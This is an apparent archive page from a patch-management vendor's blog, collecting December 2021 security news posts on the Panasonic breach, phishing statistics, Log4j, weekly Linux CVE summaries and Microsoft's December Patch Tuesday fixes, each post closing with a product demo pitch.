Skip to main content
Monthly Archives

December 2021

||

Recent Attacks, Threats, and Breaches

By NewsNo Comments

Recent Attacks, Threats, and Breaches

There are so many breaches and attacks these days, that it is hard to keep up. Here are a few of the recent highlights.

There are so many breaches and attacks these days, that it is hard to keep up. Here are a few of the recent highlights:

1. Panasonic Breach

Panasonic is the latest high-profile victim of cybercriminals. It released a statement that it had suffered a breach of its network and that some data had been accessed during an intrusion.

The company claims it contained the breach and enacted countermeasures successfully. But investigation of the leak is ongoing, and until completed, the full extent of the damage has yet to be known. Some outlets reported that the breach began in early Summer. If that is the case, we could soon be hearing more about how deeply hackers infiltrated Panasonic systems.

2. New Phishing Report

No matter how much phishing is reported and how much security awareness training is done, it seems there is always someone willing to click to a dubious link or attachment. Terranova Security’s 2021 Phishing Benchmark Global Report found:

  • 8% of those surveyed fail to spot nefarious emails
  • Education, Finance and Insurance, and IT exhibited the highest totals, all scoring over 25%
  • Healthcare, Transport, and Consumer Product all kept their click rates under 10%
  • Overall, more than 50% of initial clickers on phishing emails downloaded a malicious file link.
  • IT had the highest click-to-download ratio across all industries, with 84% of those who clicked on the initial phishing link eventually downloading the malware file.
  • The United States fared better overall, with an 8.7% click rate and a 40.9% click-to-download rate.
  • Canada had a 14.1% click rate and a 59.8% click-to-download rate.
  • 8% of North American employees would fall victim to a phishing email if they were to receive one today

3. Vulnerabilities Increase for Fifth Straight Year

The US-CERT Vulnerability Database announced that the USA set a new record of security vulnerabilities for 2021. This marks the fifth year in a row setting a new annual total. As of December 8, 2021, a total of 18,376 vulnerabilities were detected in production code.

The good news is that fewer high-severity vulnerabilities were found compared to 2020.

Conclusions Drawn

With high-profile companies continually being the subject of security breach headlines, phishing and ransomware on a definite increase, and the number of vulnerabilities rising, these are not happy times for the security space.

While there are many remedial actions that can and must be taken, the best defense is to prevent a breach from happening in the first place. The single most effective action that IT can take is to be diligent in installing patches. And that’s where Syxsense comes in.

Syxsense takes care of:

  • Patch distribution: sending the right patches to the right devices rapidly.
  • Patch supersedence: automatically ignoring older patches that are included as part of a newer release
  • Eliminating network overload: If you push Microsoft Office patches out to 300 machines simultaneously, it can stall the network due to the quantity of data involved. Intelligent management platforms send the patch across the wire once to be shared peer-to-peer within the network.
  • Mobile devices returning to the office: The system detects their presence, quarantines the devices, checks for compliance, and remediates any issues before allowing them back onto the network.
  • Patch approval: Some organizations require various points of approval before patches are released. Good management tools make it easy to set this up once and thereafter be implemented automatically as part of the patching process.
  • Audits: Integrated management of vulnerability scanning and patch remediation simplifies the task of gathering up information for audits via drag and drop capabilities.
  • Patch roll back: If a patch caused an issue, it should be a simple matter to roll it back without IT jumping through hoops.
  • Threat alerts: Intelligent management sifts through enormous log entries and narrows threats downs to the handful requiring urgent attention.
Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
December 24, 2021
Love0
||

Linux Vulnerabilities of the Week: December 20, 2021

By NewsNo Comments

Linux Vulnerabilities of the Week: December 20, 2021

See this week's top Linux issues and keep your IT environment protected from the latest December Linux vulnerabilities.

1. Apache Log4j logging library vulnerability

Severity: Critical         CVSS Score: 10.0

This is a flaw in Apache that allows an attacker who can control log messages or log message parameters to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as this can be exposed over any network, with low complexity, low privileges, and without user interaction. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-44228

2. Java logging library Apache Log4j (version 1.x) flaw affecting Red Hat Enterprise Linux 8

Severity: Important    CVSS Score: 8.1

MSAppender in Log4j 1.x is vulnerable to deserialization of untrusted data. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender and to the attacker’s JMS Broker.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires a complex attack to be exploited, it can be exposed over any network, without privileges and user interaction.

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-4104

3. STARTTLS session encryption bypassing in Fetchmail (< 6.4.22) affecting Red Hat Enterprise Linux 8

Severity: Medium       CVSS Score: 5.9

Fetchmail before 6.4.22 fails to enforce STARTTLS session encryption in some circumstances, such as a certain situation with IMAP and PREAUTH.

The highest threat from this vulnerability is to data confidentiality.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires a complex attack to be exploited, it can be exposed over any network, without privileges and user interaction.

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-39272

4. RESTEasy (<4.6.0.Final) vulnerability

Severity: Medium       CVSS Score: 5.3

This is a flaw in all versions of RESTEasy up to 4.6.0.Final. The endpoint class and method names are returned as part of the exception response when RESTEasy cannot convert one of the request URI path or query values to the matching JAX-RS resource method’s parameter value. The highest threat from this vulnerability is to data confidentiality.

Syxscore Risk Alert

This vulnerability has a moderate risk as this can be exposed over any network, with low complexity, low privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-20289

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
December 20, 2021
Love0

Watch the Webcast: December Patch Tuesday 2021

By Patch Management, Patch TuesdayNo Comments

Watch the Webcast: December Patch Tuesday

Watch this week's webcast to hear IT industry experts discuss strategies for tackling Microsoft's December Patch Tuesday updates.

December Patch Tuesday 2021

What’s your December patch strategy?

Our webcast will show you how to prioritize the latest updates for this month’s Microsoft Patch Tuesday. We’ll do a deep dive into each of the bulletins and show you how to navigate the risks of newly-identified vulnerabilities.

Our team of IT management experts have deployed over 100 million patches. Watch our free webinar to get industry-leading patch management strategies delivered right to your desk.

View the Webcast

What You Need to Know: December Patch Tuesday

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
December 16, 2021
Love0
||

December Patch Tuesday 2021 Resolves 67 Vulnerabilities

By News, Patch Management, Patch TuesdayNo Comments

December Patch Tuesday 2021 Fixes 67 Vulnerabilities

December Patch Tuesday has arrived with 67 security gaps remediated, including one critical weaponized threat.

December Patch Tuesday Arrives with 67 Fixes

There are 7 Critical (one more than last month) and 60 Important fixes in this release.  Updates were included for Microsoft Windows and Windows Components, ASP.NET Core and Visual Studio, Azure Bot Framework SDK, Internet Storage Name Service, Defender for IoT, Edge (Chromium-based), Microsoft Office and Office Components, SharePoint Server, PowerShell, Remote Desktop Client, Windows Hyper-V, Windows Mobile Device Management and Windows Remote Access.

Year 2 Extended Support – Windows 7 and Windows Server 2008 (including R2) have received some updates this month. We are really close to the need to review for a third and final year of ESU if you are still using Windows 7 or 2008.

Robert Brown, Head of Customer Success for Syxsense said,“There are many extremely high risk vulnerabilities this month, with one being weaponized. Six other vulnerabilities are Publicly Aware meaning the exact method to exploit is public knowledge, and with some of these being recognized by Microsoft as Exploit More Likely, this is not what our customers wants to hear going into the end of year and Holiday Season.”

 

Top December Patches and Vulnerabilities

Based on the Vendor Severity & CVSS Score, we have made a few recommendations below.  As usual we recommend our customers enter the CVE numbers below into your Patch Management solution and deploy as soon as possible.

1. CVE-2021-43890: Windows AppX Installer Spoofing Vulnerability

It has been linked to attacks associated with the Emotet/TrickBot/Bazaloader family. The vulnerability exists due to incorrect permissions in the windows installer service.  A local user can run a specially-crafted program to execute arbitrary code with SYSTEM privileges.

Syxscore

  • Vendor Severity: Critical
  • CVSS: 7.1
  • Weaponized: Yes
  • Public Aware: Yes
  • Countermeasure: Yes

 Syxscore Risk

    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges: Low
    • User Interaction: Required
    • Scope (Jump Point): No

2. CVE-2021-43905: Microsoft Office App Remote Code Execution Vulnerability

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system. A remote attacker can send a specially-crafted request and execute arbitrary code on the target system because of an improper input validation in Microsoft Office app.

Microsoft have suggested this vulnerability is Exploitation More Likely and with the threat of a Jump Point, this vulnerability can be used to hop into the OS and jump into another technology. This is an extremely serious vulnerability to resolve.

Syxscore

  • Vendor Severity: Critical
  • CVSS: 9.6
  • Weaponized: No
  • Public Aware: No
  • Countermeasure: No 

Syxscore Risk

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges: None
  • User Interaction: Required
  • Scope (Jump Point): Yes

3. CVE-2021-43217: Windows Encrypting File System (EFS) Remote Code Execution Vulnerability

The vulnerability exists due to a boundary error when processing untrusted input in Windows Encrypting File System (EFS). The Encrypted File System, or EFS, provides an additional level of security for files and directories. It provides cryptographic protection of individual files on NTFS file system volumes using a public-key system. A remote attacker can trigger out-of-bounds write and execute arbitrary code on the target system.

Syxscore

  • Vendor Severity: Critical
  • CVSS: 8.1
  • Weaponized: No
  • Public Aware: Yes
  • Countermeasure: No

Syxscore Risk

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges: None
  • User Interaction: None
  • Scope (Jump Point): No

Syxsense Recommendations

Based on the Vendor Severity and CVSS Score, we have made a few recommendations below which you should prioritize this month; please pay close attention to any of these which are Publicly Aware and / or Weaponized.

CVE Reference Description Vendor Severity CVSS Score Weaponized Public Aware Countermeasure Highest Priority
CVE-2021-43890 Windows AppX Installer Spoofing Vulnerability Important 7.1 Yes Yes Yes Yes
CVE-2021-43240 NTFS Set Short Name Elevation of Privilege Vulnerability Important 7.8 No Yes No Yes
CVE-2021-41333 Windows Print Spooler Elevation of Privilege Vulnerability Important 7.8 No Yes No Yes
CVE-2021-43893 Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability Important 7.5 No Yes No Yes
CVE-2021-43883 Windows Installer Elevation of Privilege Vulnerability Important 7.1 No Yes No Yes
CVE-2021-43880 Windows Mobile Device Management Elevation of Privilege Vulnerability Important 5.5 No Yes No Yes
CVE-2021-43215 iSNS Server Remote Code Execution Vulnerability Critical 9.8 No No No Yes
CVE-2021-43899 Microsoft 4K Wireless Display Adapter Remote Code Execution Vulnerability Critical 9.8 No No No Yes
CVE-2021-43907 Visual Studio Code WSL Extension Remote Code Execution Vulnerability Critical 9.8 No No No Yes
CVE-2021-43905 Microsoft Office app Remote Code Execution Vulnerability Critical 9.6 No No No Yes
CVE-2021-43882 Microsoft Defender for IoT Remote Code Execution Vulnerability Important 9 No No No Yes
CVE-2021-41365 Microsoft Defender for IoT Remote Code Execution Vulnerability Important 8.8 No No No Yes
CVE-2021-42311 Microsoft Defender for IoT Remote Code Execution Vulnerability Important 8.8 No No No Yes
CVE-2021-42313 Microsoft Defender for IoT Remote Code Execution Vulnerability Important 8.8 No No No Yes
CVE-2021-42314 Microsoft Defender for IoT Remote Code Execution Vulnerability Important 8.8 No No No Yes
CVE-2021-42315 Microsoft Defender for IoT Remote Code Execution Vulnerability Important 8.8 No No No Yes
CVE-2021-42309 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 8.8 No No No Yes
CVE-2021-42310 Microsoft Defender for IoT Remote Code Execution Vulnerability Critical 8.1 No No No Yes
CVE-2021-43217 Windows Encrypting File System (EFS) Remote Code Execution Vulnerability Critical 8.1 No No No Yes
CVE-2021-42320 Microsoft SharePoint Server Spoofing Vulnerability Important 8 No No No Yes
CVE-2021-43233 Remote Desktop Client Remote Code Execution Vulnerability Critical 7 No No No Yes
CVE-2021-43877 ASP.NET Core and Visual Studio Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2021-40452 HEVC Video Extensions Remote Code Execution Vulnerability Important 7.8 No No No
CVE-2021-40453 HEVC Video Extensions Remote Code Execution Vulnerability Important 7.8 No No No
CVE-2021-41360 HEVC Video Extensions Remote Code Execution Vulnerability Important 7.8 No No No
CVE-2021-42312 Microsoft Defender for IOT Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2021-43256 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No No
CVE-2021-43875 Microsoft Office Graphics Remote Code Execution Vulnerability Important 7.8 No No No
CVE-2021-43891 Visual Studio Code Remote Code Execution Vulnerability Important 7.8 No No No
CVE-2021-43214 Web Media Extensions Remote Code Execution Vulnerability Important 7.8 No No No
CVE-2021-43207 Windows Common Log File System Driver Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2021-43226 Windows Common Log File System Driver Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2021-43248 Windows Digital Media Receiver Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2021-43245 Windows Digital TV Tuner Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2021-43232 Windows Event Tracing Remote Code Execution Vulnerability Important 7.8 No No No
CVE-2021-43234 Windows Fax Service Remote Code Execution Vulnerability Important 7.8 No No No
CVE-2021-40441 Windows Media Center Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2021-43229 Windows NTFS Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2021-43230 Windows NTFS Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2021-43231 Windows NTFS Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2021-43223 Windows Remote Access Connection Manager Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2021-43238 Windows Remote Access Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2021-43237 Windows Setup Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2021-43247 Windows TCP/IP Driver Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2021-43242 Microsoft SharePoint Server Spoofing Vulnerability Important 7.6 No No No
CVE-2021-43225 Bot Framework SDK Remote Code Execution Vulnerability Important 7.5 No No No
CVE-2021-43888 Microsoft Defender for IoT Information Disclosure Vulnerability Important 7.5 No No No
CVE-2021-43222 Microsoft Message Queuing Information Disclosure Vulnerability Important 7.5 No No No
CVE-2021-43236 Microsoft Message Queuing Information Disclosure Vulnerability Important 7.5 No No No
CVE-2021-43228 Sym Crypt Denial of Service Vulnerability Important 7.5 No No No
CVE-2021-43219 DirectX Graphics Kernel File Denial of Service Vulnerability Important 7.4 No No No
CVE-2021-43889 Microsoft Defender for IoT Remote Code Execution Vulnerability Important 7.2 No No No
CVE-2021-42294 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 7.2 No No No
CVE-2021-43892 Microsoft BizTalk ESB Toolkit Spoofing Vulnerability Important 7.1 No No No
CVE-2021-43239 Windows Recovery Environment Agent Elevation of Privilege Vulnerability Important 7.1 No No No
CVE-2021-42293 Microsoft Jet Red Database Engine and Access Connectivity Engine Elevation of Privilege Vulnerability Important 6.5 No No No
CVE-2021-43216 Microsoft Local Security Authority Server (lsasrv) Information Disclosure Vulnerability Important 6.5 No No No
CVE-2021-43244 Windows Kernel Information Disclosure Vulnerability Important 6.5 No No No
CVE-2021-43246 Windows Hyper-V Denial of Service Vulnerability Important 5.6 No No No
CVE-2021-43255 Microsoft Office Trust Center Spoofing Vulnerability Important 5.5 No No No
CVE-2021-43896 Microsoft PowerShell Spoofing Vulnerability Important 5.5 No No No
CVE-2021-43227 Storage Spaces Controller Information Disclosure Vulnerability Important 5.5 No No No
CVE-2021-43235 Storage Spaces Controller Information Disclosure Vulnerability Important 5.5 No No No
CVE-2021-42295 Visual Basic for Applications Information Disclosure Vulnerability Important 5.5 No No No
CVE-2021-43243 VP9 Video Extensions Information Disclosure Vulnerability Important 5.5 No No No
CVE-2021-43224 Windows Common Log File System Driver Information Disclosure Vulnerability Important 5.5 No No No
CVE-2021-43908 Visual Studio Code Spoofing Vulnerability Important N/A No
Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
December 15, 2021
Love0
||

Log4j | Weaponized Threat

By Patch ManagementNo Comments

Log4j Weaponized Threat

A vulnerability in Log4j which is a very popular Java-based logging tool has been weaponized. The threat is impacting millions.

Extremely Dangerous Vulnerability Discovered

This weekend a vulnerability in Log4j which is a very popular Java-based logging tool has been Weaponized.  All versions of Log4j prior to 2.14.1 are vulnerable, this does not just impact the stand alone installer.  Any application which uses Log4j for log file management or LDAP queries could also be vulnerable, unfortunately where this is the case the vendor must provide updates for those 3rd party updates.

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

What makes this extra serious, is that the Scope (we call it a Jump Point) is Changed – meaning that exploitation of this vulnerability could allow the attacked to affect resources beyond the security scope managed by the security authority of the vulnerable component.

CVE-2021-44228 – CVSS Score: 10

Syxsense Risk Alert 

    • Attack Vector: Any Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope (Jump Point): Yes

As always, we recommend full testing be performed prior to live deployment to your device. These are now available within Syxsense.

How to Protect Your Business from Logj4

Although a number of popular IT management and security tools are vulnerable, Syxsense is pleased to confirm that it does NOT use Log4j. Syxsense Secure and Enterprise customers can use the Syxsense security scanner to identify endpoints that are exposed to this new vulnerability.

Syxsense vulnerability scanner is not only a complete security management package, it is automated, repeatable, and generates quick results, delivering security and safety in a timely manner. With security scanning and patch management in one console, Syxsense Secure is the only product that not only shows you what’s wrong, but also deploys the solution.

It offers visibility into OS and third-party vulnerabilities like defects, errors, or misconfigurations of components, while increasing cyber resilience. And it is fully integrated with automated patch management software that lets you easily manage unpatched vulnerabilities with the click of a button.

Syxsense includes patch supersedence, patch roll back, and a wealth of automation features. In addition, it provides a three-hour turnaround for the testing and delivery of new patches as well as technology to send software and patches across the wire once, using peer-to-peer within the network for local distribution.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
December 14, 2021
Love0
||

Linux Vulnerabilities of the Week: December 6, 2021

By NewsNo Comments

Linux Vulnerabilities of the Week: December 6, 2021

See this week's top Linux issues and keep your IT environment protected from the latest December Linux vulnerabilities.

1. CSRF token bypass in Mailman (<2.1.38)

Severity: Important    CVSS Score: 8.8

A Cross-Site Request Forgery (CSRF) attack can be performed in GNU Mailman due to a CSRF token bypass.

CSRF tokens are not checked against the right type of user when performing admin operations and a token created by a regular user can be used by an admin to perform an admin-level request to set a new admin password or make other changes.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as though it requires user interaction, this can be exposed over any network, with low complexity, and without privileges.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-44227

2. Xen PoD Operation denial of service

Severity: Important    CVSS Score: 8.8

PoD operations on misaligned GFNs T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] x86 HVM and PVH guests may be started in populate-on-demand (PoD) mode, to provide a way for them to later easily have more memory assigned. Guests are permitted to control certain P2M aspects of individual pages via hypercalls. These hypercalls may act on ranges of pages specified via page orders (resulting in a power-of-2 number of pages).

The implementation of some of these hypercalls for PoD does not enforce the base page frame number to be suitably aligned for the specified order, yet some code involved in PoD handling actually makes such an assumption. These operations are XENMEM_decrease_reservation (CVE-2021-28704) and XENMEM_populate_physmap (CVE-2021-28707), the latter usable only by domains controlling the guest, i.e. a de-privileged qemu or a stub domain. (Patch 1, combining the fix to both these two issues.) In addition handling of XENMEM_decrease_reservation can also trigger a host crash when the specified page order is neither 4k nor 2M nor 1G (CVE-2021-28708, patch 2).

Syxscore Risk Alert

This vulnerability has a major risk as although this needs access to the same network as the device, it can be exposed with a low-complexity attack, low privileges, and without user interaction. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-28708

3. Insufficient symlink protection in Node.js ‘tar file’

Severity: Important    CVSS Score: 8.6

This is a flaw in the npm package “tar” (aka node-tar). Extracting tar files that contain both a directory and a symlink with the same name, where the symlink and directory names in the archive entry used backslashes as a path separator, made it possible to bypass node-tar symlink checks on directories.

This flaw allows an untrusted ‘tar file’ to extract and overwrite files into an arbitrary location. A similar confusion can arise on case-insensitive filesystems.

The highest threat from this vulnerability is to integrity and system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires access to the same network as the device and user interaction to be exploited, it can be exposed with a low-complexity attack, and without privileges. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-37701

4. Node.js ‘npmcli/arborist’ library vulnerability

Severity: Important    CVSS Score: 7.8

`@npmcli/arborist`, the library that calculates dependency trees and manages the node_modules folder hierarchy for the npm command-line interface, aims to guarantee that package dependency contracts will be met, and the extraction of package contents will always be performed into the expected folder. This is accomplished by extracting package contents into a project’s `node_modules` folder. If the `node_modules` folder of the root project or any of its dependencies is somehow replaced with a symbolic link, it could allow Arborist to write package dependencies to any arbitrary location on the file system.

Syxscore Risk Alert

This vulnerability has a major risk as although this needs access to the same network as the device and requires user interaction, it can be exposed with a low-complexity attack and without privileges.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-39135

5. Incorrect parsing of HTTP transfer-encoding request header in Apache Tomcat

Severity: Medium       CVSS Score: 5.3

This is a flaw in Apache Tomcat. Tomcat incorrectly ignored the transfer encoding header if the client declared it would only accept an HTTP/1.0 response.

The highest threat from this vulnerability is to integrity.

Syxscore Risk Alert

This vulnerability has a moderate risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-33037

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
December 6, 2021
Love0
||

Linux Vulnerabilities of the Week: November 30, 2021

By NewsNo Comments

Linux Vulnerabilities of the Week: November 30, 2021

See this week's top Linux issues and keep your IT environment protected from the latest November Linux vulnerabilities.

1. A heap buffer overflow in Redis (>2.6)

Severity: Important    CVSS Score: 8.8

Redis is an open-source, in-memory database that persists on disk. In affected versions Specially crafted Lua scripts executing in Redis cause the heap-based Lua stack to overflow due to incomplete checks for this condition. This flaw allows a remote attacker to corrupt the heap and potentially trigger remote code execution.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as this can be exposed over any network, with low complexity, low privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-32626

2. Memory corruption in WebKitGTK affecting Red Hat Enterprise Linux 8

Severity: Important    CVSS Score: 7.8

This is a flaw in WebKitGTK. Processing maliciously crafted web content may lead to arbitrary code execution.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this needs access to the same network as the device and requires user interaction, it can be exposed by an unprivileged user with a low complexity attack.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-30846

3. Incorrect principal selection in OpenJDK

Severity: Medium       CVSS Score: 6.8

This is a vulnerability in the Java SE (8u301, 11.0.12, 17), Oracle GraalVM Enterprise Edition (20.3.3 and 21.2.0) product of Oracle Java SE (component: Libraries).

Exploiting this flaw, a low privileged attacker with network access via Kerberos can compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can lead to unauthorized access to critical data or complete access to all Java SE, Oracle GraalVM Enterprise Edition accessible data.

The highest threat from this vulnerability is to data confidentiality.

Syxscore Risk Alert

This vulnerability has a moderate risk as although requires user interaction to be exploited, it can be exposed over any network, with a low complexity attack, and low privileges. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: Required
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-35567

4. Limited sandbox escape via VFS syscalls in WebKitGTK

Severity: Medium       CVSS Score: 5.3

BubblewrapLauncher.cpp in WebKitGTK and WPE WebKit before 2.34.1 allows a limited sandbox bypass that allows a sandboxed process to trick host processes into thinking the sandboxed process is not confined by the sandbox, by abusing VFS syscalls that manipulate its filesystem namespace.

The impact is limited to host services that create UNIX sockets that WebKit mounts inside its sandbox, and the sandboxed process remains otherwise confined.

Syxscore Risk Alert

This vulnerability has a moderate risk as although this needs access to the same network as the device, it can be exposed with a low complexity attack, low privileges, and without user interaction.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-42762

5. Server response processing flaw in Bind affecting Red Hat Enterprise Linux 8

Severity: Medium       CVSS Score: 5.3

This is a flaw in BIND 9.3.0 -> 9.11.35, 9.12.0 -> 9.16.21, and versions 9.9.3-S1 -> 9.11.35-S1 and 9.16.8-S1 -> 9.16.21-S1 of BIND Supported Preview Edition, as well as release versions 9.17.0 -> 9.17.18 of the BIND 9.17 development branch.

The way the lame cache is currently designed makes it possible for its internal data structures to grow almost infinitely. This caching mechanism could be abused by an attacker to significantly degrade resolver performance.

The highest threat from this vulnerability is to system availability.

Syxscore Risk Alert

This vulnerability has a moderate risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-25219

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
December 1, 2021
Love0